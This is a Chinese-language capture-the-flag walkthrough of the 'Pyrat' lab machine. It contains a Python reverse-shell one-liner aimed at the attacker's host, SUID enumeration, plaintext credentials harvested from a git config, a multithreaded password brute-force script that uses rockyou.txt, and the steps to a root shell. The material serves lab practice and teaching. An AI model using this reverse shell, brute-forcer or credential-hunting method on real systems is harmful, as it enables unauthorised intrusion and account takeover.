kali:192.168.56.104
靶机:192.168.56.123
端口扫描
# nmap 192.168.56.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 15:36 CST
Nmap scan report for 192.168.56.123
Host is up (0.00040s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8000/tcp open http-alt
MAC Address: 08:00:27:B2:CD:3D (Oracle VirtualBox virtual NIC)
开启了22 8000两个端口
先看8000
尝试基础的连接
nc连上之后,经过测试发现可以执行python语句
反弹个shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
# nc 192.168.56.123 8000
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.123] 35634
bash: /root/.bashrc: Permission denied
www-data@Pyrat:~$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null
bash: /root/.bashrc: Permission denied
然后也没有suid提权
www-data@Pyrat:/tmp$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
经过翻文件,在/opt/dev/.git/config下翻到了用户think的密码
www-data@Pyrat:/opt/dev/.git$ cat config
cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[user]
name = Jose Mario
email = josemlwdf@github.com
[credential]
helper = cache --timeout=3600
[credential "https://github.com"]
username = think
password = _TH1NKINGPirate$_
think/_TH1NKINGPirate$_
# ssh think@192.168.56.123
think@192.168.56.123's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-150-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
You have mail.
Last login: Thu Jun 15 12:09:31 2023 from 192.168.204.1
think@Pyrat:~$
拿到user权限
邮箱有提示
think@Pyrat:/var/mail$ cat think
From root@pyrat Thu Jun 15 09:08:55 2023
Return-Path: <root@pyrat>
X-Original-To: think@pyrat
Delivered-To: think@pyrat
Received: by pyrat.localdomain (Postfix, from userid 0)
id 2E4312141; Thu, 15 Jun 2023 09:08:55 +0000 (UTC)
Subject: Hello
To: <think@pyrat>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20230615090855.2E4312141@pyrat.localdomain>
Date: Thu, 15 Jun 2023 09:08:55 +0000 (UTC)
From: Dbile Admen <root@pyrat>
Hello jose, I wanted to tell you that i have installed the RAT you posted on your GitHub page, i'll test it tonight so don't be scared if you see it running. Regards, Dbile Admen
在github上面有东西
里面找到一个py脚本,不过没什么用
这里直接看wp了,给了一个爆破脚本
import socket
# Define the server's address and port
server_address = ('192.168.56.123', 8000) # Replace with your server's address and port
def send_word(word):
# Create a socket object
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Connect to the server
client_socket.connect(server_address)
# Send the word to the server
client_socket.sendall(word.encode())
# Receive data from the server (if applicable)
response = client_socket.recv(1024)
response = response.decode()
if not word in response:
print(f"Sent: {word} | Received: {response}")
except ConnectionRefusedError:
print("Connection was refused. Is the server running?")
finally:
# Close the socket connection
client_socket.close()
def read_wordlist_from_file(filename):
with open(filename, 'r') as file:
wordlist = file.readlines()
return [word.strip() for word in wordlist]
# Path to the wordlist file
wordlist_filename = 'wordlist.txt'
# Read words from the file
words = read_wordlist_from_file(wordlist_filename)
# Iterate through the words and send each one to the server
for word in words:
send_word(word)
def test_this(password):
# Create a socket object
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Connect to the server
client_socket.connect(server_address)
# Send the word to the server
client_socket.sendall('admin'.encode())
# Receive data from the server (if applicable)
response = client_socket.recv(1024)
response = response.decode()
if 'Password' in response:
client_socket.sendall(password)
response = client_socket.recv(1024)
response = response.decode()
if not 'Password' in response:
print('Password:', password)
except ConnectionRefusedError:
print("Connection was refused. Is the server running?")
finally:
# Close the socket connection
client_socket.close()
def test_creds():
from threading import Thread
wordlist = '/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt'
passwords = read_wordlist_from_file(wordlist)
threads = []
for password in passwords:
thread = Thread(target=test_this, args=(password, ))
thread.start()
threads.append(thread)
if len(threads) >= 30:
for thread in threads:
thread.join()
threads = []
wp给了两个脚本,第二个部分就是爆破
最后爆破出来密码是september
Open a terminal or command prompt.
Run the following command to connect to the server:
nc <server_ip> <server_port>
Replace <server_ip> with the IP address of the server where the script is running and <server_port> with the port number specified in the script (8000 in this case).
After connecting, you can interact with the script using the following commands:
Admin: To access the admin functionality, type admin and press Enter. You will be prompted to enter a password. Enter the password and press Enter. If the password is correct, you will see the message "Welcome Admin!!! Type 'shell' to begin". You can then proceed to use the shell functionality.
Shell: To access the shell functionality, type shell and press Enter. This will spawn a shell on the server, allowing you to execute commands. You can enter any valid shell command, and the output will be displayed on your nc session.
Python Interactive: To execute python commands on the server just send your python commands and it will be passed to the exec function.
Note: Make sure to replace <server_ip> with the actual IP address of the server running the script.
根据readme 的提示
nc连接之后 输入admin 再输入密码再输入shell就能拿到root
# nc 192.168.56.123 8000
admin
Password:
september
Welcome Admin!!! Type "shell" to begin
shell
# ls
ls
pyrat.py root.txt snap
# cat root.txt
cat root.txt
b***************